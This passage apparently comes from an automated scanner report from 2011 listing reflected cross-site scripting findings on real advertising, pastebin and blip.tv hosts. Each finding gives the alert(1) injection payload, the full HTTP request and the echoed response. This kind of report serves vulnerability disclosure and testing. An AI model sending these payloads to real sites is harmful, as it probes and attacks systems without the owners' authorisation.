GET /2/B3DM/2010DM/1548248067@x23ec8df"><script>alert(1)</script>c890c99deb6?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:49 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/;httponly
The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f5f"-alert(1)-"2e2171ccfc5 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_72812f5f"-alert(1)-"2e2171ccfc5 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:44 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2438 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/;httponly
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_72812f5f"-alert(1)-"2e2171ccfc5";
3.62. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dm.de.mookie1.com
Path: /2/B3DM/2010DM/1548248067@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b5c1"-alert(1)-"8ce35333fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728&1b5c1"-alert(1)-"8ce35333fa2=1 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:44 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2441 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/;httponly
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/Dominos_11Q2_247_CPC_728&1b5c1"-alert(1)-"8ce35333fa2=1";
The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload 37405<a%20b%3dc>7b26340890c was submitted in the lc parameter. This input was echoed as 37405<a b=c>7b26340890c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /quant.swf?qcv=2%2E1%2E1&url=http%3A%2F%2Fstatic%2Eslidesharecdn%2Ecom%2Fswf%2Fssplayer2%2Eswf%3Fdoc%3D3%2Draylyle%2Dviglinkforumconppt%2D1%2D110218170233%2Dphpapp01%26stripped%5Ftitle%3D3%2Dray%2Dlyleviglink%2Dforumcon%2Dppt1%26userName%3DVigLink&pageURL=http%3A%2F%2Fblog%2Eviglink%2Ecom%2F&stripped%5Ftitle=3%2Dray%2Dlyleviglink%2Dforumcon%2Dppt1&doc=3%2Draylyle%2Dviglinkforumconppt%2D1%2D110218170233%2Dphpapp01&flashPlayer=WIN%2010%2C2%2C154%2C27&fpf=1%2D0%2D0&userName=VigLink&media=widget&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&lc=%5F1303238625614%5F138037405<a%20b%3dc>7b26340890c&videoId=embed%5Fplayer%5Fas3&publisherId=p%2DabU44ONrAuwk2 HTTP/1.1 Host: flash.quantserve.com Proxy-Connection: keep-alive Referer: http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=3-raylyle-viglinkforumconppt-1-110218170233-phpapp01&stripped_title=3-ray-lyleviglink-forumcon-ppt1&userName=VigLink Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EEgBCQHGBpEA
FWS.Z...x.._.........D.....C....?.0....X.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns ...[SNIP]... ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1303238625614_138037405<a b=c>7b26340890c.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=.. ..........O..............=................@................... . .................R....setUpLoc ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57401"><script>alert(1)</script>c45cd3456f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM57401"><script>alert(1)</script>c45cd3456f/DLX/1@x96 HTTP/1.1 Host: mig.nexac.com Proxy-Connection: keep-alive Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:04 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW802t6rQACp/p; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 325 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b04c"><script>alert(1)</script>d331ea74841 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX3b04c"><script>alert(1)</script>d331ea74841/1@x96 HTTP/1.1 Host: mig.nexac.com Proxy-Connection: keep-alive Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:06 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW802t6rYACzMV; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 327 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 673dc"><script>alert(1)</script>a2584dc8a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX/1@x96673dc"><script>alert(1)</script>a2584dc8a HTTP/1.1 Host: mig.nexac.com Proxy-Connection: keep-alive Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:08 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: OAX=rcHW802t6rgADA1J; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 316 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac1d9"><script>alert(1)</script>cc58d6ba2eb was submitted in the REST URL parameter 1. This input was echoed as ac1d9\"><script>alert(1)</script>cc58d6ba2eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /74KXCaEZac1d9"><script>alert(1)</script>cc58d6ba2eb HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin.com/74KXCaEZac1d9\"><script>alert(1)</script>cc58d6ba2eb"/> ...[SNIP]...
3.68. http://pastebin.com/74KXCaEZ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pastebin.com
Path: /74KXCaEZ
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ee33"><script>alert(1)</script>b559bf62345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ee33\"><script>alert(1)</script>b559bf62345 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /74KXCaEZ?6ee33"><script>alert(1)</script>b559bf62345=1 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c0"><script>alert(1)</script>1fb414533ea was submitted in the REST URL parameter 1. This input was echoed as 491c0\"><script>alert(1)</script>1fb414533ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /CvGXyfiJ491c0"><script>alert(1)</script>1fb414533ea HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin.com/CvGXyfiJ491c0\"><script>alert(1)</script>1fb414533ea"/> ...[SNIP]...
3.70. http://pastebin.com/CvGXyfiJ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pastebin.com
Path: /CvGXyfiJ
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aade4"><script>alert(1)</script>5eef0908687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aade4\"><script>alert(1)</script>5eef0908687 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /CvGXyfiJ?aade4"><script>alert(1)</script>5eef0908687=1 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78747"><script>alert(1)</script>13324821e99 was submitted in the REST URL parameter 1. This input was echoed as 78747\"><script>alert(1)</script>13324821e99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /DBDqm6Km78747"><script>alert(1)</script>13324821e99 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin.com/DBDqm6Km78747\"><script>alert(1)</script>13324821e99"/> ...[SNIP]...
3.72. http://pastebin.com/DBDqm6Km [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pastebin.com
Path: /DBDqm6Km
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d31"><script>alert(1)</script>4d54ae0ed58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7d31\"><script>alert(1)</script>4d54ae0ed58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /DBDqm6Km?a7d31"><script>alert(1)</script>4d54ae0ed58=1 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06bd"><script>alert(1)</script>a97465dbc53 was submitted in the REST URL parameter 1. This input was echoed as f06bd\"><script>alert(1)</script>a97465dbc53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /X8znzPWHf06bd"><script>alert(1)</script>a97465dbc53 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin.com/X8znzPWHf06bd\"><script>alert(1)</script>a97465dbc53"/> ...[SNIP]...
3.74. http://pastebin.com/X8znzPWH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pastebin.com
Path: /X8znzPWH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ebb"><script>alert(1)</script>ccd34ed679c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9ebb\"><script>alert(1)</script>ccd34ed679c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /X8znzPWH?f9ebb"><script>alert(1)</script>ccd34ed679c=1 HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f518"><script>alert(1)</script>94a013f3381 was submitted in the REST URL parameter 1. This input was echoed as 2f518\"><script>alert(1)</script>94a013f3381 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /u2f518"><script>alert(1)</script>94a013f3381/ComodoHacker HTTP/1.1 Host: pastebin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the advId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a727c"-alert(1)-"0a1ceb9fb9d was submitted in the advId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384a727c"-alert(1)-"0a1ceb9fb9d&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17607"-alert(1)-"736181fd054 was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=13417607"-alert(1)-"736181fd054&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41148"-alert(1)-"97cd6e245a9 was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384&campId=539639741148"-alert(1)-"97cd6e245a9&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the chanId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d9e"-alert(1)-"bdc978586f7 was submitted in the chanId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132b7d9e"-alert(1)-"bdc978586f7&placementId=62214207&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.80. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://pixel.adsafeprotected.com
Path: /jspix
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bc6"-alert(1)-"70137643fe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126&89bc6"-alert(1)-"70137643fe4=1 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the placementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e10"-alert(1)-"ffa02563ec8 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=6221420713e10"-alert(1)-"ffa02563ec8&pubId=1036126 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71116"-alert(1)-"f92110ae5 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=103612671116"-alert(1)-"f92110ae5 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.83. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sourcebarcelona2010.blip.tv
Path: /posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65992"><script>alert(1)</script>7d42614a729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?65992"><script>alert(1)</script>7d42614a729=1 HTTP/1.1 Host: sourcebarcelona2010.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.84. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sourcebarcelona2010.blip.tv
Path: /posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f1e'%3balert(1)//c148b0a504b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5f1e';alert(1)//c148b0a504b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?a5f1e'%3balert(1)//c148b0a504b=1 HTTP/1.1 Host: sourcebarcelona2010.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.85. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sourceboston2008.blip.tv
Path: /posts
Issue detail
